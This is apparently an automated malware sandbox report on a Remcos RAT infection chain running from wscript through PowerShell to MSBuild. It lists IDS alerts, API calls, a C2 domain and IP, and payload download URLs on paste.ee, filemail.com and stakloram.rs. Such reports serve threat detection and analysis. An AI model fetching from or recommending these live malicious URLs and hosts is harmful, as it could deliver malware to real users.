nlib.dotnet.writerimdtablednlib.dotnet.resourcesresourcedatacreatordnlib.dotnet.mdrawmodulerefrowdnlib.dotnet.writercor20headeroptionsdnlib.dotnettypesigdnlib.dotnetalltypeshelper<>c__5`1microsoft.win32.taskschedulermonthlytriggerdnlib.dotnetmethoddefuserdnlib.dotnet.mdmetadataheaderdnlib.dotnet.emitopcodednlib.dotnetihassemanticdnlib.dotnetinterfaceimpldnlib.dotnetitokenoperanddnlib.dotnetidnlibdefmicrosoft.win32.taskschedulercomhandleractiondnlib.dotnetfullnamecreatordnlib.dotnetimethoddecrypterdnlib.dotnet.mdrawrowequalitycomparerdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduleritriggerdelaydnlib.dotnetpropertysigdnlib.dotnetassemblyresolverdnlib.dotnetstrongnamesignerdnlib.dotnetfixedarraymarshaltypednlib.dotnet.pdbpdbscope source: powershell.exe, 00000002.00000002.2510865192.00007FF8488CC000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: `1dnlib.dotnetstandalonesiguserdnlib.dotnetihasdeclsecuritydnlib.dotnetutf8stringequalitycomparerdnlib.dotnet.pdbpdbstatednlib.dotnet.writermetadataheaderoptionsdnlib.dotnet.mdrawconstantrowdnlib.dotnetdeclsecurityusermicrosoft.win32.taskschedulertaskprincipaldnlib.dotnet.writermodulewriterexceptiondnlib.dotnet.pdbisymbolwriter2 source: powershell.exe, 00000002.00000002.2510865192.00007FF8488CC000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: dnlib.pepeimagemicrosoft.win32.taskschedulerregistrationtriggermicrosoft.win32.taskschedulerdaysoftheweekmicrosoft.win32.taskschedulertaskrunflagsdnlib.dotnet.mdrawparamptrrowdnlib.dotnet.writerichunkdnlib.dotnet.resourcescreateresourcedatadelegatednlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawenclogrowmicrosoft.win32.taskschedulertaskeventenumeratordnlib.dotnet.writericustomattributewriterhelperdnlib.peiimageoptionalheaderdnlib.dotnet.writermodulewriterdnlib.threadingthreadsafelistcreatordnlib.dotnet.mdrawfieldrvarowdnlib.dotnet.writerhotheap20dnlib.dotnet.mdcolumnsizednlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnet.writerdeclsecuritywriterconnectiontokendnlib.dotnet.writeruniquechunklist`1microsoft.win32.taskschedulertaskrunleveldnlib.dotnettypespecdnlib.dotnet.mdrawimplmaprowdnlib.dotnet.writermodulewriteroptionsdnlib.threadingextensionsdnlib.peipeimagednlib.dotnetinvalidkeyexceptiondnlib.dotnetfileattributesmicrosoft.win32.taskschedulerlogontriggerdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnet.writerhotheap40dnlib.dotnetmodulerefdnlib.dotnetsigcomparerdnlib.dotnet.writermetadatadnlib.dotnet.pdbsequencepointdnlib.dotnet.pdb.managedpdbexceptiondnlib.peimagentheadersdnlib.pemachinednlib.peimageoptionalheader64dnlib.dotnettypedefdnlib.dotnetvaluetypesigdnlib.dotnetbytearrayequalitycomparerdnlib.dotnetpropertydefuserdnlib.dotnet.writertablesheapdnlib.dotnet.mdrawmemberrefrowdnlib.dotnet.writerhottablednlib.dotnetconstantdnlib.dotnetassemblydefuserdnlib.dotnetmodulerefuserdnlib.dotnetexportedtypednlib.iofileoffsetdnlib.dotnet.mdrawfieldptrrowdnlib.dotnet.writerimportaddresstablednlib.dotnet.mdrawmethodptrrowdnlib.dotnet.mdrawinterfaceimplrowdnlib.dotnet.emitmethodutilsdnlib.dotnetcallingconventionsigdnlib.peimageoptionalheader32dnlib.dotnet.emitiinstructionoperandresolverdnlib.dotnetcustomattributecollectionmicrosoft.win32.taskschedulertsnotsupportedexceptiondnlib.dotnetitypednlib.dotnettypedeforrefsigdnlib.w32resourcesresourcedirectoryuserdnlib.dotnet.emitinstructionprintermicrosoft.win32.taskschedulerwildcardmicrosoft.win32.taskschedulercustomtriggerdnlib.w32resourcesresourcedirectorypemicrosoft.win32.taskscheduler.fluentintervaltriggerbuildermicrosoft.win32.taskschedulerresourcereferencevaluednlib.dotnet.pdb.managedsymbolreadercreatordnlib.dotnet.mdcodedtokendnlib.dotnetassemblynameinfodnlib.dotnet.emitstackbehaviourmicrosoft.win32.taskschedulertaskstatednlib.dotnet.mdrawmodulerowdnlib.dotnet.pdb.dssisymunmanageddocumentwritermicrosoft.win32.taskschedulertaskcompatibilitydnlib.dotnet.emitinvalidmethodexceptiondnlib.dotnetnullresolverdnlib.dotnetdeclsecuritydnlib.dotnet.emitdynamicmethodbodyreaderdnlib.dotnet.mdrawcustomattributerowdnlib.dotnet.resourcesresourceelementdnlib.dotnet.writerrelocdirectorydnlib.w32resourceswin32resourcespednlib.dotnetsigcompareroptionsdnlib.dotnet.mdrawmethodimplrowdnlib.dotnetsafearraymarshaltypednlib.dotnet.mdrawclasslayoutrowdnlib.dotnet.writerpeheadersoptionsmicrosoft.win32.taskschedulernamedvaluecollecti
          Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000002.00000002.2510865192.00007FF8488CC000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: `1taskprincipalprivilegesenumeratordnlib.dotnetifullnamemicrosoft.win32.taskscheduler.fluentactionbuilderdnlib.dotnet.mdmdheaderruntimeversionmicrosoft.win32.taskschedulerrunningtaskcollectiondnlib.dotnetframeworkredirectelemdnlib.dotnet.emitistringresolverdnlib.dotnet.writernativemodulewriteroptionsdnlib.dotnet.pdb.managedpdbreadermicrosoft.win32.taskschedulertaskfoldercollectiondnlib.dotnetcallingconventionmicrosoft.win32.taskschedulertaskfoldersnapshotdnlib.iotoolsdnlib.dotnetiassemblydnlib.dotnetparamdefuserdnlib.dotnet.mdrawdeclsecurityrowdnlib.dotnet.writernativemodulewriterdnlib.dotnetmethodbasesig<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cmicrosoft.win32.taskschedulerrepetitionpatterndnlib.dotnetiassemblyreffindermicrosoft.win32.taskschedulericalendartriggerdnlib.dotnetmanifestresourcednlib.dotnet.writerimportdirectorymicrosoft.win32.taskschedulertaskservicednlib.dotnet.mdrawpropertymaprowmicrosoft.win32.taskschedulertaskinstancespolicymicrosoft.win32.taskscheduleritaskhandlerdnlib.dotnetparameterdnlib.dotnetitypedeffinderdnlib.dotnetsignaturereadermicrosoft.win32.taskschedulerboottriggerdnlib.dotnet.mdrawgenericparamrowdnlib.dotnet.writerimetadatalistenerdnlib.dotneteventequalitycomparerdnlib.dotnet.mdcolumninfodnlib.dotnetfieldsigdnlib.ioiimagestreamdnlib.threadinglistiteratedelegate`1dnlib.dotnetassemblynamecomparerflagsdnlib.dotnet.mdrawmethodsemanticsrowdnlib.dotnetpublickeydnlib.dotnetgenericsig source: powershell.exe, 00000002.00000002.2510865192.00007FF8488CC000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: dnlib.dotnet.pdbsymbolwritercreator source: powershell.exe, 00000002.00000002.2512100355.00007FF848950000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000002.00000002.2510865192.00007FF8488CC000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: dnlib.dotnetscopetypednlib.dotnet.writerguidheapdnlib.dotnet.writertablesheapoptionsdnlib.dotnetgenericparamcontextdnlib.dotnetresourcetypednlib.dotnet.writerstrongnamesignaturednlib.dotnetifullnamecreatorhelperdnlib.dotnetvtablednlib.dotnetrawmarshaltypednlib.dotnet.pdbimage_debug_directorydnlib.dotnet.emitopcodetypednlib.dotnet.writerheapbasednlib.dotnet.mdmdtablednlib.dotnetfieldequalitycomparerdnlib.dotnetdeclsecurityreaderdnlib.dotnetimethoddnlib.dotnetarraymarshaltypednlib.dotnetityperesolver source: powershell.exe, 00000002.00000002.2512100355.00007FF848950000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_0041A01B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_0040B28E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_0040838E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_004087A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_00407848
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_004068CD FindFirstFileW,FindNextFileW,8_2_004068CD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0044BA59 FindFirstFileExA,8_2_0044BA59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_0040AA71
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,8_2_00417AAB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_0040AC78
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_00406D28

          Software Vulnerabilities

          barindex
          Suspicious execution chain found
          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49850 -> 109.248.150.195:3174
          Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 193.30.119.105:443 -> 192.168.2.5:49802
          Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound : 37.27.124.176:443 -> 192.168.2.5:49837
          Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 37.27.124.176:443 -> 192.168.2.5:49837
          Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 37.27.124.176:443 -> 192.168.2.5:49837
          Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 37.27.124.176:443 -> 192.168.2.5:49837
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\System32\wscript.exeNetwork Connect: 23.186.113.60 443Jump to behavior
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: meme.linkpc.net
          Connects to a pastebin service (likely for C&C)
          Source: unknownDNS query: name: paste.ee
          Source: global trafficTCP traffic: 192.168.2.5:49850 -> 109.248.150.195:3174
          Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d HTTP/1.1Host: 3005.filemail.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /css/nom.txt HTTP/1.1Host: stakloram.rsConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
          Source: Joe Sandbox ViewIP Address: 23.186.113.60 23.186.113.60
          Source: Joe Sandbox ViewIP Address: 193.30.119.105 193.30.119.105
          Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
          Source: Joe Sandbox ViewASN Name: DATACLUBLV DATACLUBLV
          Source: Joe Sandbox ViewASN Name: UNINETAZ UNINETAZ
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49861 -> 178.237.33.50:80
          Source: global trafficHTTP traffic detected: GET /d/FsssIAil HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
          Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
          Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
          Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
          Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
          Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
          Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
          Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
          Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
          Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
          Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
          Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
          Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
          Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.36
          Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.36
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
          Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.140
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0041936B InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,8_2_0041936B
          Source: global trafficHTTP traffic detected: GET /d/FsssIAil HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d HTTP/1.1Host: 3005.filemail.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /css/nom.txt HTTP/1.1Host: stakloram.rsConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
          Source: global trafficDNS traffic detected: DNS query: paste.ee
          Source: global trafficDNS traffic detected: DNS query: 3005.filemail.com
          Source: global trafficDNS traffic detected: DNS query: stakloram.rs
          Source: global trafficDNS traffic detected: DNS query: meme.linkpc.net
          Source: global trafficDNS traffic detected: DNS query: geoplugin.net
          Source: MSBuild.exe, MSBuild.exe, 00000008.00000002.3527390495.0000000001208000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3527819349.0000000001255000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3527819349.0000000001266000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
          Source: MSBuild.exe, 00000008.00000002.3527819349.0000000001255000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp$Y
          Source: powershell.exe, 00000002.00000002.2452741154.0000016F102FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3525134792.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
          Source: MSBuild.exe, 00000008.00000002.3527390495.0000000001208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpn.net/son.gpD
          Source: powershell.exe, 00000002.00000002.2452741154.0000016F10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000002.00000002.2434026127.0000016F00222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000002.00000002.2434026127.0000016F00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000002.00000002.2434026127.0000016F01D63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://stakloram.rs
          Source: powershell.exe, 00000002.00000002.2434026127.0000016F00222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000002.00000002.2500458772.0000016F7E011000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://30.f
          Source: powershell.exe, 00000002.00000002.2434026127.0000016F00222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3005.filemail.com
          Source: wscript.exe, 00000001.00000003.2295498528.000002309E457000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2296718606.000002309E45A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2296206892.000002309E457000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRvia
          Source: powershell.exe, 00000002.00000002.2434026127.0000016F0052D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2434026127.0000016F00222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS
          Source: powershell.exe, 00000002.00000002.2434026127.0000016F00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: wscript.exe, 00000001.00000003.2298685914.000002309F0FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298609114.000002309E420000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2301232692.000002309E7B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298976054.000002309E428000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
          Source: wscript.exe, 00000001.00000003.2298685914.000002309F0FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298609114.000002309E420000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2301232692.000002309E7B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298976054.000002309E428000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
          Source: wscript.exe, 00000001.00000002.2305119705.000002309E429000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2300279826.000002309F0FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.2305940898.000002309F0FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298685914.000002309F0FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298609114.000002309E420000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2301232692.000002309E7B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298976054.000002309E428000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
          Source: wscript.exe, 00000001.00000003.2298685914.000002309F0FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298609114.000002309E420000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2301232692.000002309E7B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298976054.000002309E428000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
          Source: powershell.exe, 00000002.00000002.2452741154.0000016F10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000002.00000002.2452741154.0000016F10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000002.00000002.2452741154.0000016F10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: wscript.exe, 00000001.00000003.2298685914.000002309F0FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298609114.000002309E420000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2301232692.000002309E7B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298976054.000002309E428000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
          Source: wscript.exe, 00000001.00000003.2298685914.000002309F0FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298609114.000002309E420000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2301232692.000002309E7B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298976054.000002309E428000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
          Source: powershell.exe, 00000002.00000002.2434026127.0000016F00222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/dahall/taskscheduler
          Source: wscript.exe, 00000001.00000002.2305799629.000002309F09A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
          Source: powershell.exe, 00000002.00000002.2452741154.0000016F10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: wscript.exe, 00000001.00000002.2305799629.000002309F09A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/
          Source: wscript.exe, 00000001.00000002.2303704431.000002309C578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/FsssIAil
          Source: wscript.exe, 00000001.00000003.2301232692.000002309E7B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/FsssIAilDVP
          Source: wscript.exe, 00000001.00000003.2300165261.000002309C576000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2299971448.000002309C56E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.2303704431.000002309C578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/FsssIAill
          Source: wscript.exe, 00000001.00000003.2298685914.000002309F0FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298609114.000002309E420000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2301232692.000002309E7B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298976054.000002309E428000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
          Source: powershell.exe, 00000002.00000002.2434026127.0000016F003D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2434026127.0000016F01D03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stakloram.rs
          Source: powershell.exe, 00000002.00000002.2434026127.0000016F003D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2434026127.0000016F01D03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stakloram.rs/css/nom.txt
          Source: powershell.exe, 00000002.00000002.2434026127.0000016F01D03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stakloram.rsX
          Source: wscript.exe, 00000001.00000003.2298685914.000002309F0FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298609114.000002309E420000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2301232692.000002309E7B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298976054.000002309E428000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
          Source: wscript.exe, 00000001.00000003.2298685914.000002309F0FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298609114.000002309E420000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2301232692.000002309E7B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298976054.000002309E428000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: wscript.exe, 00000001.00000003.2298685914.000002309F0FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298609114.000002309E420000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2301232692.000002309E7B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298976054.000002309E428000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
          Source: wscript.exe, 00000001.00000003.2298685914.000002309F0FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298609114.000002309E420000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2301232692.000002309E7B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2298976054.000002309E428000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
          Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
